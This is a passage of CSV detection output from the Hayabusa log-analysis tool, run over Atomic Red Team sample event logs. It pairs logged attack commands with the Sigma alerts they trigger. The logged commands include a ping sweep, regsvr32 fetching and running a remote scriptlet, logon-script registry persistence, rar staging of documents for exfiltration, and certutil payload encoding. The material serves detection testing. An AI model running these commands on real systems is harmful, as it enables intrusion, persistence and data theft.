192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 